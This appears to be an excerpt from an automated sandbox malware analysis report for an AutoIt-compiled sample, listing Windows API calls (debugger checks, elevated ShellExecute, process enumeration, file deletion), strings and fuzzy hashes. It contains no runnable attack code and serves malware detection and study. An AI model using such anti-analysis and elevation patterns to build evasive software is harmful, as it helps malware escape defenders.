                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f3b342313a9d7fe41d542e2d6a4aaf8cd4169691a7dbc21d1b043f2728df9cbf
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A0A1A02280A3C4DFC716CB687C4E5A57FA5AB66300F28A8DBE48497223D37D458CCB35

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00133368,?), ref: 001333BB
                                                                                                                                                                                                                                                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00133368,?), ref: 001333CE
                                                                                                                                                                                                                                                                                                          • GetFullPathNameW.KERNEL32(00007FFF,?,?,00202418,00202400,?,?,?,?,?,?,00133368,?), ref: 0013343A
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00138577: _wcslen.LIBCMT ref: 0013858A
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0013425F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00133462,00202418,?,?,?,?,?,?,?,00133368,?), ref: 001342A0
                                                                                                                                                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?,00000001,00202418,?,?,?,?,?,?,?,00133368,?), ref: 001334BB
                                                                                                                                                                                                                                                                                                          • MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse user this program.,AutoIt,00000010), ref: 00173CB0
                                                                                                                                                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?,00202418,?,?,?,?,?,?,?,00133368,?), ref: 00173CF1
                                                                                                                                                                                                                                                                                                          • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,001F31F4,00202418,?,?,?,?,?,?,?,00133368), ref: 00173D7A
                                                                                                                                                                                                                                                                                                          • ShellExecuteW.SHELL32(00000000,?,?), ref: 00173D81
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001334D3: GetSysColorBrush.USER32(0000000F), ref: 001334DE
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001334D3: LoadCursorW.USER32(00000000,00007F00), ref: 001334ED
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001334D3: LoadIconW.USER32(00000063), ref: 00133503
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001334D3: LoadIconW.USER32(000000A4), ref: 00133515
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001334D3: LoadIconW.USER32(000000A2), ref: 00133527
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001334D3: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 0013353F
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001334D3: RegisterClassExW.USER32(?), ref: 00133590
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001335B3: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 001335E1
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001335B3: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00133602
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001335B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00133368,?), ref: 00133616
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001335B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00133368,?), ref: 0013361F
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0013396B: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00133A3C
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
• Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcslen
                                                                                                                                                                                                                                                                                                          • String ID: 0$ $AutoIt$It is a violation of the AutoIt EULA to attempt to reverse user this program.$runas
                                                                                                                                                                                                                                                                                                          • API String ID: 683915450-554883960
                                                                                                                                                                                                                                                                                                          • Opcode ID: e58ee321864f607f732a4e605951cc3434fab87552a190efd950db894bd83478
                                                                                                                                                                                                                                                                                                          • Instruction ID: 361744cd5db1797a187fff961a1a34b21da7e9073b633efae8fb3eaf823f3a69
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e58ee321864f607f732a4e605951cc3434fab87552a190efd950db894bd83478
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A3511770208344EEC715EF60EC49D6EBFB8AFA5744F04042EF5A1521A3DB348A8DD762

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00135851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,001355D1,?,?,00174B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00135871
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0019EAB0: GetFileAttributesW.KERNEL32(?,0019D840), ref: 0019EAB1
                                                                                                                                                                                                                                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 0019DCCB
                                                                                                                                                                                                                                                                                                          • DeleteFileW.KERNEL32(?,?,?,?), ref: 0019DD1B
                                                                                                                                                                                                                                                                                                          • FindNextFileW.KERNELBASE(00000000,00000010), ref: 0019DD2C
                                                                                                                                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 0019DD43
                                                                                                                                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 0019DD4C
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
• Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                                                                                                                                                                                                                                          • String ID: \*.*
                                                                                                                                                                                                                                                                                                          • API String ID: 2649000838-1173974218
                                                                                                                                                                                                                                                                                                          • Opcode ID: 469d91d73fa0f2a3473482b4a6ea6b1ea5572058a9dc5aa417a1bc375e4064a9
                                                                                                                                                                                                                                                                                                          • Instruction ID: 7a8a234eecb6a260b877a6deacd6201a8b1594f0f18149bf1a87a38a5dddad5c
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 469d91d73fa0f2a3473482b4a6ea6b1ea5572058a9dc5aa417a1bc375e4064a9
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 77316E31008385AFC700EB64D8818EFBBE9BEA6704F444D6DF5D5821D1EB21DA09CB63
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 0019DDAC
                                                                                                                                                                                                                                                                                                          • Process32FirstW.KERNEL32(00000000,?), ref: 0019DDBA
                                                                                                                                                                                                                                                                                                          • Process32NextW.KERNEL32(00000000,?), ref: 0019DDDA
                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0019DE87
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
• Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 420147892-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 16937c055135629a01c71b3bdb847593b885c911e07eea3b78ea2f3559693d07
                                                                                                                                                                                                                                                                                                          • Instruction ID: 1ecd1dc4e57e51460b7ab3c233a5b80dd0d0507ec425158c7c44baff31cb1516
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 16937c055135629a01c71b3bdb847593b885c911e07eea3b78ea2f3559693d07
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E231AE71008300AFD710EF60D885AAFBBE8BFA9344F44092DF581871A1EB71DA49CB92
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
• Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CloseHandleMemoryProtectVirtual
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2407445808-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                                                                                                                                                          • Instruction ID: cedb68390ae074fda517455eb3e3b61494e0918e408b158aaa5f24b111795794
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1231D770A00106DFCB1ACF98D590A69F7A5FF49381B6586A5E819CF292D732EDC5CBC0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetInputState.USER32 ref: 0013EF07
                                                                                                                                                                                                                                                                                                          • timeGetTime.WINMM ref: 0013F107
                                                                                                                                                                                                                                                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0013F228
                                                                                                                                                                                                                                                                                                          • TranslateMessage.USER32(?), ref: 0013F27B
                                                                                                                                                                                                                                                                                                          • DispatchMessageW.USER32(?), ref: 0013F289
                                                                                                                                                                                                                                                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0013F29F
                                                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(0000000A), ref: 0013F2B1
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
• Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                                                                                                                                                                                                                                                                                          • String ID: (
                                                                                                                                                                                                                                                                                                          • API String ID: 2189390790-2181176062
                                                                                                                                                                                                                                                                                                          • Opcode ID: 7cbf361b6e8590a434c23ca3ecd5271e3e9fd39a3008482019cef4b8b982b90c
                                                                                                                                                                                                                                                                                                          • Instruction ID: 109672e46de8cf07a33c585a96a539cf6d4a4f86646c1e953c9313a88a789cb3
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7cbf361b6e8590a434c23ca3ecd5271e3e9fd39a3008482019cef4b8b982b90c
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 84421630A04742DFD728DF24D888BAABBE5BF55304F14452DF5658B2A1D770E989CF82

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
• Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                          • String ID: `* $d0b$d10m0$d1b$d1r0,2$d5m0$e# $i$( $( $( $(
                                                                                                                                                                                                                                                                                                          • API String ID: 0-774687368
                                                                                                                                                                                                                                                                                                          • Opcode ID: 67b19a5c49f2436713bfc7386d052560386f3f16ccbf504aac867d7491cb95f5
                                                                                                                                                                                                                                                                                                          • Instruction ID: 39f1a729e6135898b186ae748c906d74a79247754ef282392c8d0c9cd3cbab6c
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 67b19a5c49f2436713bfc7386d052560386f3f16ccbf504aac867d7491cb95f5
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 16624A70508341CFC728DF24D195AAABBE1FF98304F50896EE4999B361DB71DA49CF82

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00133709,?,?), ref: 00133777
                                                                                                                                                                                                                                                                                                          • KillTimer.USER32(?,00000001,?,?,?,?,?,00133709,?,?), ref: 001337A3
                                                                                                                                                                                                                                                                                                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 001337C6
                                                                                                                                                                                                                                                                                                          • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00133709,?,?), ref: 001337D1
                                                                                                                                                                                                                                                                                                          • CreatePopupMenu.USER32 ref: 001337E5
                                                                                                                                                                                                                                                                                                          • PostQuitMessage.USER32(00000000), ref: 00133806
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
• Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                                                                                                                                                                                                          • String ID: 0$ $0$ $TaskbarCreated
                                                                                                                                                                                                                                                                                                          • API String ID: 129472671-3218616665
                                                                                                                                                                                                                                                                                                          • Opcode ID: 413dce09280cef11d40a2ea83cbe6b9a8f32d5780a08d5387c3c001f9781ff35
                                                                                                                                                                                                                                                                                                          • Instruction ID: e37b5c650d3a8f7d5b926c78bad9853770b232cba9f37874adbae934e7063458
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 413dce09280cef11d40a2ea83cbe6b9a8f32d5780a08d5387c3c001f9781ff35
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0141F6F1210344FBDB182B7CEC4DB793A69E714315F10422AF626861A2CB74DB49A769

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetSysColorBrush.USER32(0000000F), ref: 00133657
                                                                                                                                                                                                                                                                                                          • RegisterClassExW.USER32(00000030), ref: 00133681
                                                                                                                                                                                                                                                                                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00133692
                                                                                                                                                                                                                                                                                                          • InitCommonControlsEx.COMCTL32(?), ref: 001336AF
                                                                                                                                                                                                                                                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 001336BF
                                                                                                                                                                                                                                                                                                          • LoadIconW.USER32(000000A9), ref: 001336D5
                                                                                                                                                                                                                                                                                                          • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 001336E4
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
• Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                                                                                                                                                                                                          • String ID: +$0$AutoIt v3 GUI$TaskbarCreated

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0017071A: CreateFileW.KERNEL32(00000000,00000000,?,00170A84,?,?,00000000,?,00170A84,00000000,0000000C), ref: 00170737
                                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00170AEF
                                                                                                                                                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 00170AF6
                                                                                                                                                                                                                                                                                                          • GetFileType.KERNEL32(00000000), ref: 00170B02
                                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00170B0C
                                                                                                                                                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 00170B15
                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00170B35
                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00170C7F
                                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00170CB1
                                                                                                                                                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 00170CB8
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
• Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                                                                                                                                                                                          • String ID: H

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00135594: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00174B76,?,?,00000100,00000000,00000000,CMDLINE,?,?,00000001,00000000), ref: 001355B2
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00135238: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0013525A
                                                                                                                                                                                                                                                                                                          • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 001353C4
                                                                                                                                                                                                                                                                                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00174BFD
                                                                                                                                                                                                                                                                                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00174C3E
                                                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00174C80
                                                                                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 00174CE7
                                                                                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 00174CF6
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
• Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                                                                                                                                                                                                                                                                          • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetSysColorBrush.USER32(0000000F), ref: 001334DE
                                                                                                                                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 001334ED
                                                                                                                                                                                                                                                                                                          • LoadIconW.USER32(00000063), ref: 00133503
                                                                                                                                                                                                                                                                                                          • LoadIconW.USER32(000000A4), ref: 00133515
                                                                                                                                                                                                                                                                                                          • LoadIconW.USER32(000000A2), ref: 00133527
                                                                                                                                                                                                                                                                                                          • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 0013353F
                                                                                                                                                                                                                                                                                                          • RegisterClassExW.USER32(?), ref: 00133590
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00133624: GetSysColorBrush.USER32(0000000F), ref: 00133657
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00133624: RegisterClassExW.USER32(00000030), ref: 00133681
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00133624: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00133692
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00133624: InitCommonControlsEx.COMCTL32(?), ref: 001336AF
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00133624: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 001336BF
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00133624: LoadIconW.USER32(000000A9), ref: 001336D5
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00133624: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 001336E4
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                                                                                                                                                                                                          • String ID: #$0$AutoIt v3
                                                                                                                                                                                                                                                                                                          • API String ID: 423443420-4155596026
                                                                                                                                                                                                                                                                                                          • Opcode ID: e0d5ad30104203b7864c7c86aa98062d0d6997b867b9eb9b7cdba82aea16ccb6
                                                                                                                                                                                                                                                                                                          • Instruction ID: 90545d9f10a725a5b1c7686f917d8c4f31770f1f5701f31cd6bce75e84d868d4
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e0d5ad30104203b7864c7c86aa98062d0d6997b867b9eb9b7cdba82aea16ccb6
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 66211D70D00354EBDB109FA5FC5DA99BFB8FB48B54F00406BE604A62A1D7B945898F94
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                          • String ID: Variable must be of type 'Object'.$t5 $t5 $t5 $t5 $t5 t5 $`
                                                                                                                                                                                                                                                                                                          • API String ID: 0-2097392079
                                                                                                                                                                                                                                                                                                          • Opcode ID: b747929d7794ac13fa22440387ced8906929a632cbd0166decb206aaa140ffa1
                                                                                                                                                                                                                                                                                                          • Instruction ID: ba9cd3fb99d8d9ea95437d3225e55c3bdaeb6c7b8638239dc85e56bee3faf1b3
